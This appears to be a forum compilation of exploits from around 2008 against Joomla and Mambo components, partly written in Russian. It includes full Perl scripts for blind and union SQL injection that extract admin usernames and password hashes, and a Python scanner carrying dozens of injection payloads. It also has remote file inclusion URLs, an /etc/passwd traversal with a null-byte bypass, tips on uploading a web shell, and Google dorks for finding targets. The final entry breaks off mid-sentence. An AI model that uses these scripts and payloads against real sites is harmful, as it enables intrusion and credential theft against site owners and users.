Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit Code: #!/usr/bin/perl #[[Script Name: Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit #[[Coded by : MEFISTO #[[Author : ilker Kandemir #[[Dork : "index.php?option=com_news_portal" or "Powered by iJoomla News Portal" use IO::Socket; if(@ARGV < 1){ print " [[======================================================================== [[// Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit [[// Usage: cnp.pl [target] [[// Example: cnp.pl victim.com [[// Vuln&Exp : iLker Kandemir a.k.a MEFISTO [[// website : www.dumenci.net - [[======================================================================== "; exit(); } #Local variables $server = $ARGV[0]; $server =~ s/(http:\/\/)//eg; $host = "http://".$server; $port = "80"; $file = "/index.php?option=com_news_portal&Itemid="; print "Script <DIR> : "; $dir = <STDIN>; chop ($dir); if ($dir =~ /exit/){ print "-- Exploit Failed[You Are Exited] \n"; exit(); } if ($dir =~ /\//){} else { print "-- Exploit Failed[No DIR] \n"; exit(); } $target = "-1%20union%20select%20111,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),333%20from%20jos_users/*"; $target = $host.$dir.$file.$target; #Writing data to socket print "+**********************************************************************+\n"; print "+ Trying to connect: $server\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; print $socket "GET $target HTTP/1.1\n"; print $socket "Host: $server\n"; print $socket "Accept: */*\n"; print $socket "Connection: close\n\n"; print "+ Connected!...\n"; #Getting while($answer = <$socket>) { if ($answer =~ /username:(.*?)pass/){ print "+ Exploit succeed! Getting admin information.\n"; print "+ ---------------- +\n"; print "+ Username: $1\n"; } if ($answer =~ /password:(.*?)border/){ print "+ Password: $1\n"; } if ($answer =~ /Syntax error/) { print "+ Exploit Failed : ( \n"; print "+**********************************************************************+\n"; exit(); } if ($answer =~ /Internal Server Error/) { print "+ Exploit Failed : ( \n"; print "+**********************************************************************+\n"; exit(); } } # milw0rm.com [2008-06-09] milw0rm.com [2008-06-09]
Mambo Component galleries v 1.0 Remote SQL Injection HTML: #!/usr/bin/perl -w # Mambo Component galleries v 1.0 Remote SQL Injection # ######################################## #[*] Found by : Houssamix From H-T Team #[*] H-T Team [ HouSSaMix + ToXiC350 ] #[*] Greetz : bugtr4cker & Stack & HaCkeR_EgY & Hak3r-b0y & All friends & All muslims HaCkeRs :) #[*] Script_Name: "Mambo" #[*] Component_Name: galleries v 1.0 ######################################## # <mosinstall type="component"> # <name>galleries</name> #<creationDate>10/04/2006</creationDate> #<author>Vinay Kr. Singh</author> #<copyright>This component is released under the GNU License</copyright> #<authorEmail>[email protected]</authorEmail> #<authorUrl>www.opensource.com</authorUrl> #<version>1.0</version> system("color f"); print "\t\t########################################################\n\n"; print "\t\t# Viva Islam #\n\n"; print "\t\t########################################################\n\n"; print "\t\t# Mambo Component galleries 1.0 Remote SQL Injection #\n\n"; print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n"; print "\t\t########################################################\n\n"; use LWP::UserAgent; print "\nEnter your Target (http://site.com/mambo/): "; chomp(my $target=<STDIN>); $uname="username"; $passwd="password"; $magic="mos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "/index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62))from/**/".$magic."/**"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; print "\n[+] The Target : ".$target.""; if ($answer =~ /<user>(.*?)<user>/){ print "\n[+] Admin User : $1"; } $host2 = $target . "index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,".$passwd."/**/from/**/".$magic."/**"; $res2 = $b->request(HTTP::Request->new(GET=>$host2)); $answer = $res2->content; if ($answer =~/([0-9a-fA-F]{32})/){ print "\n[+] Admin Hash : $1\n\n"; print "# Exploit succeed! #\n\n"; } else{print "\n[-] Exploit Failed...\n"; } # codec by Houssamix From H-T Team # milw0rm.com [2008-06-13] milw0rm.com [2008-06-13]
Mambo <= 4.6.4 Remote File Inclusion Vulnerability HTML: .-----------------------------------------------------------------------------. | vuln.: Mambo <= 4.6.4 Remote File Inclusion Vulnerability | | download: http://mambo-foundation.org/ | | | | author: [email protected] | | homepage: http://irk4z.wordpress.com/ | | | | greets to: all friends ;) | '-----------------------------------------------------------------------------' # code: /includes/Cache/Lite/Output.php : 1 <?php 2 3 /** 4 * This class extends Cache_Lite and uses output buffering to get the data to cache. 5 * 6 * There are some examples in the 'docs/examples' file 7 * Technical choices are described in the 'docs/technical' file 8 * 9 * @package Cache_Lite 10 * @version $Id: Output.php,v 1.1 2005/07/22 01:57:13 eddieajau Exp $ 11 * @author Fabien MARTY <[email protected]> 12 */ 13 14 require_once($mosConfig_absolute_path . '/includes/Cache/Lite.php'); ... ^ no comment.. RFI in line 14.. # exploit: http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell? # milw0rm.com [2008-06-13] milw0rm.com [2008-06-13]
Joomla components AstatsPro: /administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(username,password,0x2e,usertype)+from+jos_users+limit+2,1-- Залезть в пхпмайадмин можно узнав пароль с помощью JoomlaXplorer (если таковой установлен), после добычи пароля заходим в компонент JoomlaXplorer, далее ищем configuration.php и читаем логин и пасс от БД. Залить шелл также можно с помощью етого компонента.
Joomla Component expshop Remote SQL injection Joomla Component expshop Remote SQL injection Уязвимость: http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid={SQL} Пример: http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users-- # milw0rm.com [2008-06-22] http://www.milw0rm.com/exploits/5893
Joomla Component com_facileforms 1.4.4 Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «ff_compath» сценарием facileforms.frame.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Эксплоит: www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL] /path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]
Mambo Component Articles Blind SQL Injection 0-day Exploit by Ded MustD!e PHP: #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " #######################################################################\n"; print " # Mambo Component Articles Blind SQL Injection Exploit #\n"; print " # Author:Ded MustD!e [www.antichat.ru] #\n"; print " # #\n"; print " # Dork : inurl:option=articles artid #\n"; print " # Usage: perl exploit.pl host path <options> #\n"; print " # Example: perl exploit.pl www.host.com /joomla/ -a 2 #\n"; print " # #\n"; print " # Options: #\n"; print " # -a valid Article id #\n"; print " #######################################################################\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $userid = 1; my $aid = $ARGV[2]; my %options = (); GetOptions(\%options, "u=i", "p=s", "a=i"); print "[~] Exploiting...\n"; if($options{"u"}) { $userid = $options{"u"}; } if($options{"a"}) { $aid = $options{"a"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $userid, $aid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $userid, $aid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host = shift; my $path = shift; my $uid = shift; my $aid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php?option=articles&task=viewarticle&artid=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h.""; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "Back"; if($content =~ /$regexp/) { return 1; } else { return 0; } }
Joomla Component netinvoice Remote SQL injection POC : Code: http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid={SQL} Example: Code: http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users-- (c)milw0rm.com
Joomla Component beamospetition Remote SQL injection [*] Author : His0k4 [ALGERIAN HaCkEr] [*] Dork : inurl:com_beamospetition [*] POC : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet={SQL} [*] Example : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet=-5 UNION SELECT user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users-- ------------------------------------------------------------------------ # milw0rm.com [2008-06-28]
Mambo Component n-gallery SQL Injection Mambo Component n-gallery SQL Injection DORK : allinurl:"com_n-gallery" index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/* milw0rm.com [2008-06-30] и еще Joomla Component Xe webtv Blind SQL Injection Exploit Code: #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " ################################################################\n"; print " # Joomla Component Xe webtv Blind SQL Injection Exploit #\n"; print " # Author:His0k4 [ALGERIAN HaCkeR] #\n"; print " # #\n"; print " # Conctact: His0k4.hlm[at]gamil.com #\n"; print " # Greetz: All friends & muslims HacKeRs #\n"; print " # Greetz2: http://www.dz-secure.com #\n"; print " # http://www.palcastle.org/cc #\n"; print " # #\n"; print " # Dork: inurl:com_xewebtv #\n"; print " # Usage: perl xewebtv.pl host path <options> #\n"; print " # Example: perl xewebtv.pl www.host.com /joomla/ -t 11 -c 2 #\n"; print " # #\n"; print " # Options: #\n"; print " # -t Valid tv id #\n"; print " # -c Category value of the following id #\n"; print " # Note: #\n"; print " # You can change the match string if you need that #\n"; print " ################################################################\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $cid = $ARGV[2]; my $tid = $ARGV[3]; my %options = (); GetOptions(\%options, "c=i", "p=s", "t=i"); print "[~] Exploiting...\n"; if($options{"c"}) { $cid = $options{"c"}; } if($options{"t"}) { $tid = $options{"t"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $cid, $tid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $cid, $tid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host = shift; my $path = shift; my $cid = shift; my $tid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php?option=com_xewebtv&Itemid=60&func=detail&id=".$tid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "viewcategory&catid=".$cid.""; if($content =~ /$regexp/) { return 1; } else { return 0; } } # milw0rm.com [2008-06-28]
MamScan v1.0 Mambo Component SQL scanner Code: #!/usr/bin/python #Mambo Component SQL scanner, checks source for md5's #Uncomment line 44 for verbose mode. If md5 found #check manually. #http://www.darkc0de.com #d3hydr8[at]gmail[dot]com import sys, urllib2, re, time print "\n\t d3hydr8[at]gmail[dot]com MamScan v1.0" print "\t------------------------------------------" sqls = ["index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*", "index.php?option=com_catalogshop&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/null,null,concat(password),3,4,5,6,7,8,9,10,11,12,concat(username)/**/from/**/mos_users/*", "index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*", "index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users--", "index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*", "index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*", "index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*", "index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN", "index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*", "index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*", "index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*", "index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*", "index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*", "index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users", "index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*", "index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,password%2C0%2C0%2C0/**/from/**/mos_users/*", "index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users", "index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*", "index.php?option=com_gallery&Itemid=0&func=detail&id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users", "index.php?option=com_rapidrecipe&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*", "index.php?option=com_rapidrecipe&category_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*", "index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*", "index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*", "index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users", "index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),0x3a/**/from/**/jos_users/*", "index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*", "index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*", "index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*", "index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--", "index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--", "administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),concat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*", "index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*", "index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*", "index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*", "index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*", "index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*", "index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*", "index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*", "index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*", "index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*", "index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--", "index.php?option=com_accombo&func=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password)/**/from/**/mos_users/*", "index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0x3a/**/from/**/mos_users/*", "index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*", "index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%20union%20select%20concat(CHAR(60,117,115,101,114,62),username,CHAR(60,117,115,101,114,62))from/**/mos_users/**", "index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,concat(CHAR(60,117,115,101,114,62),username,CHAR(60,117,115,101,114,62))from/**/mos_users/**", "index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/*", "index.php?option=com_n-gallery&flokkur=-1+union+select+concat(username,char(58),password)KHG+from+mos_users--"] if len(sys.argv) != 2: print "\nUsage: ./mamscan.py <site>" print "Ex: ./mamscan.py www.test.com\n" sys.exit(1) host = sys.argv[1].replace("/index.php", "") if host[-1] != "/": host = host+"/" if host[:7] != "http://": host = "http://"+host print "\n[+] Site:",host print "[+] SQL Loaded:",len(sqls) print "[+] Starting Scan...\n" for sql in sqls: time.sleep(3) #Change this if needed #print "[+] Trying:",host+sql.replace("\n","") try: source = urllib2.urlopen(host+sql.replace("\n","")).read() md5s = re.findall("[a-f0-9]"*32,source) if len(md5s) >= 1: print "[!]",host+sql.replace("\n","") for md5 in md5s: print "\n[+]MD5:",md5 except(urllib2.HTTPError): pass print "\n[-] Done\n"
Joomla Component altas v 1.0 Multiple Remote SQL Injection Joomla Component altas v 1.0 Multiple Remote SQL Injection Code: #!/usr/bin/perl -w #[*] Dork : index.php?option=com_altas system("color f"); print "\t\t========================================================\n\n"; print "\t\t# Viva Islam #\n\n"; print "\t\t========================================================\n\n"; print "\t\t# Joomla Component altas v 1 multiple SQL Injection #\n\n"; print "\t\t========================================================\n\n"; print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n"; print "\t\t========================================================\n\n"; use LWP::UserAgent; print "\nEnter your Target (http://site.com/joomla/): "; chomp(my $target=<STDIN>); $uname="username"; $magic="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "index.php?option=com_altas&mes=hsmx&ano=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8 from/**/".$magic."/**"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; print "\n[+] The Target : ".$target.""; if ($answer =~ /<user>(.*?)<user>/){ print "\n[+] Admin User : $1"; } $host2 = $target . "index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users--"; $res2 = $b->request(HTTP::Request->new(GET=>$host2)); $answer = $res2->content; if ($answer =~/([0-9a-fA-F]{32})/){ print "\n[+] Admin Hash : $1\n\n"; print "# Exploit succeed! #\n\n"; } else{print "\n[-] Exploit Failed...\n"; } # coded by Houssamix From H-T Team # milw0rm.com [2008-07-04]
Component Agora Forum 1.0.4 Acropolis rus vuln code: /moderate.php PHP: $result = $db->query('SELECT id FROM '.$db->prefix.'posts WHERE topic_id='.$_GET['ptid'].' ORDER BY posted LIMIT 1'); vuln code: /my_uploads.php PHP: $db->query('UPDATE '.$db->prefix.'users SET upload=\''.$upload.'\' WHERE id='.$_GET['id']) or error(sprintf($lang_uploadile['err_insert'],$conf_name), __FILE__, __LINE__, $db->error()); Download: Code: http://freedom-ru.net/component/option,com_docman/task,doc_download/gid,41/Itemid,105/ ZAMUT (c)
Joomla Component DT Register Remote SQL injection Joomla Component DT Register Remote SQL injection Code: [*] Author: His0k4 [ALGERIAN HaCkeR] [*] Dork: inurl:com_DTRegister eventId [*] Vendor:http://www.dthdevelopment.com/components/dt-register.html [*] POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL} [*] Example:http://[TARGET]/[Path]/index.php?option=com_dtregister &eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138 [*] Greetings : All friends & muslims HaCkeRs www.dz-secure.com ---------------------------------------------------------------------------- # milw0rm.com [2008-07-16]
Продукт-Joomla Компонент -wap4joomla found by ImpLex & Microsoft Sam exploit Code: #!/usr/bin/perl -w print "\t\t ################################################################ ############ This exploit created by ImpLex ICQ: 444-979 ####### ############ from WHACK.RU ####### ############ WHACK.RU ####### ############ wapmain.php remote sql injection exploit ####### ############ LETS GO!!!! ####### ################################################################\n\n"; use LWP::UserAgent; print "\nEnter your target and folder fith wapversion(http://site.ru/wap): "; chomp(my $target=<STDIN>); print "\nEnter number (0-first user probably admin)(1-10000000000 - other users): "; chomp(my $number=<STDIN>); print "\nEnter table name with users(default jos_users(recomended) or mos_users or users) "; chomp(my $table1=<STDIN>); print "\n[+] connecting to ... ".$target.""; $new = LWP::UserAgent->new() or die "fucking browser does not work\n"; $new->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "/wapmain.php?option=onews&action=link&id=-1+union+select+1,2,3,concat(111222,0x3a3a3a,username,0x3b,password,0x3a3a3a,111222),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+".$table1."+limit+".$number.",1--"; $result = $new->request(HTTP::Request->new(GET=>$host)); $ans = $result->content; if ($ans =~ /111222:::(.*?):::111222/){ print "\n[+] User;password : $1"; print "\n[+] password = md5(md5:salt) or md5"; print "\n[+] target has been hacked"; print "\n[+] If password-md5(md5:salt) => Then user - admin"; print "\n[+] If password-md5 => Then it usual user"; } else{print "\n[-] Exploit Failed. Search new bugs or exploit:( \n";}
компонент com_imagebrowser просматриваем директории на сервере пример: index.php?option=com_imagebrowser&folder=../../../../
Joomla Component EZ Store Blind SQL Injection Exploit Joomla Component EZ Store Blind SQL Injection Exploit Code: #!/usr/bin/perl #Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid." use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " ################################################################\n"; print " # Joomla Component EZ Store Blind SQL Injection Exploit #\n"; print " # Author:His0k4 [ALGERIAN HaCkeR] #\n"; print " # #\n"; print " # Conctact: His0k4.hlm[at]gamil.com #\n"; print " # Greetz: All friends & muslims HacKeRs #\n"; print " # Greetz2: http://www.dz-secure.com #\n"; print " # #\n"; print " # Dork: inurl:com_ezstore #\n"; print " # Usage: perl ezstore.pl host path <options> #\n"; print " # Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2 #\n"; print " # #\n"; print " # Options: #\n"; print " # -t Valid procuct id #\n"; print " # -c Category value of the following product id #\n"; print " ################################################################\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $cid = $ARGV[2]; my $pid = $ARGV[3]; my %options = (); GetOptions(\%options, "c=i", "x=s", "p=i"); print "[~] Exploiting...\n"; if($options{"c"}) { $cid = $options{"c"}; } if($options{"p"}) { $pid = $options{"p"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $cid, $pid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $cid, $pid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host = shift; my $path = shift; my $cid = shift; my $pid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; if($options{"x"}) { $ua->proxy('http', "http://".$options{"x"}); } my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "viewcategory&catid=".$cid.""; if($content =~ /$regexp/) { return 1; } else { return 0; } } # milw0rm.com [2008-08-03]
Agora 1.0.4 Acropolis Rus google-> inurl: option=com_agora PHP: $task = trim( mosGetParam( $_REQUEST, 'task', "" ) ); if ($task) { require ($agora_path . "/$task.php"); } else { require ($agora_path . "/index.php"); } null байт не прокатит из-за trim, можно подключать аминские скритпты в которых нет проверки, единственный плюс обходим _VALID_MOS в скриптах, также пригодится если на жертве есть другие скрипты или если кривые настройки на серваке пожно инклюдить скрипты у соседей
да щас прям - http://php.su/functions/?trim ../../../../../../../../etc/./passwd%00fucked_trim_bypass
Joomla 1.5.x Remote Admin Password Change Joomla 1.5.x Remote Admin Password Change Code: File : /components/com_user/controller.php ##################################################################################### Line : 379-399 function confirmreset() { // Check for request forgeries JRequest::checkToken() or die( 'Invalid Token' ); // Get the input $token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1} // Get the model $model = &$this->getModel('Reset'); // Verify the token if ($model->confirmReset($token) === false) < --- {2} { $message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError()); $this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message); return false; } $this->setRedirect('index.php?option=com_user&view=reset&layout=complete'); } ##################################################################################### File : /components/com_user/models/reset.php Line: 111-130 function confirmReset($token) { global $mainframe; $db = &JFactory::getDBO(); $db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3} // Verify the token if (!($id = $db->loadResult())) { $this->setError(JText::_('INVALID_TOKEN')); return false; } // Push the token and user id into the session $mainframe->setUserState($this->_namespace.'token', $token); $mainframe->setUserState($this->_namespace.'id', $id); return true; } ##################################################################################### {1} - Replace ' with empty char {3} - If you enter ' in token field then query will be 